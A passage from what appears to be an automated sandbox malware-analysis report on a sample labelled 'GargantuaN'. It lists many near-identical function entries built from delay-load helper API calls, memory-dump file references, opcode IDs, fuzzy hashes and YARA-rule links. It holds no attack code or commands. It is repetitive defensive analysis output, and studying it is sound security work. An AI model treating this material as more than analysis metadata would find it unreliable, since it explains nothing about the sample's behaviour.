                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 89e7cb1f71a57b08ee1fbb7a50d51ec8ecc2ab169ec03f4dc7e37c20b9f556a2
                                                        • Instruction ID: 33e969d610b9a82a82434e990f601542a505a75156ce767e14540da0717cabdb
                                                        • Opcode Fuzzy Hash: 89e7cb1f71a57b08ee1fbb7a50d51ec8ecc2ab169ec03f4dc7e37c20b9f556a2
                                                        • Instruction Fuzzy Hash: 63B012E9269340FE3288A2091C02C37030DC0C1B10330413EF806C1180D850BC4C2971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 92633e83e7dfbfeb5e595a629b4a2f63fdd485efb43a2fafdd1273c393fe2557
                                                        • Instruction ID: 2010766c8fab4c66ce08f9cc4a3ce721bfc9f47bf79cf88c58e73baae5b53cdb
                                                        • Opcode Fuzzy Hash: 92633e83e7dfbfeb5e595a629b4a2f63fdd485efb43a2fafdd1273c393fe2557
                                                        • Instruction Fuzzy Hash: 18B012D9269240FE3248A1091C02C37030DC0C2B10330803EFC06C1180D850EC082971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: fefb0a5c58ee829fca2397738552854db479c17d6bf63e5599864166ee031c47
                                                        • Instruction ID: 8464d62c8b02ff436f6b0b1e71b8a505a524d3a83a40dcf86d0e5b4735c97916
                                                        • Opcode Fuzzy Hash: fefb0a5c58ee829fca2397738552854db479c17d6bf63e5599864166ee031c47
                                                        • Instruction Fuzzy Hash: 6EB012D9279240FE3248A1091C02C37134DC4C1B10330403EF807C1180D860AC082971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: f1e8a12643cd6ad222f5756ef017f2bdb02744971e6ef29f4d4b5f57b4670607
                                                        • Instruction ID: f3cd6444f939356b108111612138c080e03c4b0733c72827f33a6a0b72d49f55
                                                        • Opcode Fuzzy Hash: f1e8a12643cd6ad222f5756ef017f2bdb02744971e6ef29f4d4b5f57b4670607
                                                        • Instruction Fuzzy Hash: F0B012D9268200EE3144A1191C02C37034CC0C2B10330803EFC06C1180D850EC082971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 7890de42a6884b508e93f00f5d46f1d7fa8a003e64adf44625217359c5f91853
                                                        • Instruction ID: 8c1c219ace0034cef79de0877603dd4619358135cca3701e49f47ca2257f8535
                                                        • Opcode Fuzzy Hash: 7890de42a6884b508e93f00f5d46f1d7fa8a003e64adf44625217359c5f91853
                                                        • Instruction Fuzzy Hash: 68B012E9268200FE3144A1091C02C37030CC4C2F10330803EFC06C1184D850ED082D71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: a2ba8156448bb3c500e98fb8a99ae50e0f4f63d0b5c6658ddb76206467ca88fd
                                                        • Instruction ID: dde3149bae70c80a783df90ab55c6286f884ba7b0fd4969d6a82d676770d6bfb
                                                        • Opcode Fuzzy Hash: a2ba8156448bb3c500e98fb8a99ae50e0f4f63d0b5c6658ddb76206467ca88fd
                                                        • Instruction Fuzzy Hash: E6B012D9368340FE3184A2091C02C37030CC0C1B10330813EF80AC1280D850BC4C2971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 92290e448dcd68a979cd8eb0c82c7d7801fc91154a9945d5224b4f25e9564a94
                                                        • Instruction ID: dad96d6769fa54bf5db4ad29eb72c9844ad4b426e904d8bbc9385ee93bddd41a
                                                        • Opcode Fuzzy Hash: 92290e448dcd68a979cd8eb0c82c7d7801fc91154a9945d5224b4f25e9564a94
                                                        • Instruction Fuzzy Hash: 3EB012D92A8300EE3144A2091D03C37030CC0C1B10330803EF80AC1280DC60AD0D2971
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 19f5fb1ca259b5455531d41e5ef46c251e55de84c49dad6fedd3452de71a46b6
                                                        • Instruction ID: 7d2cae16b5a7815d2830073e287a50c5d993781eaa1074b4ae70d7e0ebb3dcf9
                                                        • Opcode Fuzzy Hash: 19f5fb1ca259b5455531d41e5ef46c251e55de84c49dad6fedd3452de71a46b6
                                                        • Instruction Fuzzy Hash: 25B012E92A8200EE3144A1091D12C37030CC0C1F10330403EF806C1184DC50AE092D71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2845a82f3e3036e1ce2dbdf5440bc89c213319fed390c05de299142e58ead56a
                                                        • Instruction ID: 276be28f74115668456c065b55cf1b2d80976002e0157a397fa915cba2246c5d
                                                        • Opcode Fuzzy Hash: 2845a82f3e3036e1ce2dbdf5440bc89c213319fed390c05de299142e58ead56a
                                                        • Instruction Fuzzy Hash: 20B012E9268200EE3144A10A1C02C37030CC0C1F10330403EF806C1184D860AD082D71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E1E3
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 98a72cf7584657aa3658e1184e67b8220058c7c9e150ac779f1b5484a57f32b0
                                                        • Instruction ID: e664cd1017bd2dbaa64e3d6d72a3704dbce5f2faa56e09fae9e403e49651d55f
                                                        • Opcode Fuzzy Hash: 98a72cf7584657aa3658e1184e67b8220058c7c9e150ac779f1b5484a57f32b0
                                                        • Instruction Fuzzy Hash: 09B012E9268300FE3184A1091C02C37030CC0C1F10330413EF806C1184D850BD482D71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 31514d7db58ac4990f68b9b0ecc38290d44edefc28b92160fe5c28752b179785
                                                        • Instruction ID: bdda2c76661e118fdcffda651437dc30766a9a5805b80c336352e4c2125ad628
                                                        • Opcode Fuzzy Hash: 31514d7db58ac4990f68b9b0ecc38290d44edefc28b92160fe5c28752b179785
                                                        • Instruction Fuzzy Hash: 61B012E9268100FE3144B1041D03C37030CC4C1B11330D03EF805D2280E8408C091A73
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 78e3d36b58b764ee6ea3198af7feff5449dbe6fa2aea981b1907fd9957eb65a7
                                                        • Instruction ID: 02f9fa22dd401ae5fabd9cbb48cea99f01c648a66dceea32d1ff158056bcdedb
                                                        • Opcode Fuzzy Hash: 78e3d36b58b764ee6ea3198af7feff5449dbe6fa2aea981b1907fd9957eb65a7
                                                        • Instruction Fuzzy Hash: 93B012E92A8100FE314471041E03C77430CC5C1B11330D03EF505D2280E8404C0E1973
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E3FC
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ef3285234239464f33fd3a602810fb798ce3ebe2c5974a5dd68677c3c0d9eb38
                                                        • Instruction ID: a6c35435052ad682f341242e135aeca690ec48aca2cd10e8ba624c70db6846d2
                                                        • Opcode Fuzzy Hash: ef3285234239464f33fd3a602810fb798ce3ebe2c5974a5dd68677c3c0d9eb38
                                                        • Instruction Fuzzy Hash: 06B012F9268000FE3144B1045D03C37031CC8C1F11330903EF805D2280E8408E051973
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2b3137356c226b9f4bbce96ed6f931a8edb139dd4f1894f84fcf7477287eb652
                                                        • Instruction ID: 4f47c11820163cce4543f2a54392e69dff9ee4ae7b8f716fd1daba08cb9e2298
                                                        • Opcode Fuzzy Hash: 2b3137356c226b9f4bbce96ed6f931a8edb139dd4f1894f84fcf7477287eb652
                                                        • Instruction Fuzzy Hash: ABB012D926C110FF314462591C03C37030CC0C0B10330503EF406C2180F8504C041972
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6E580
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
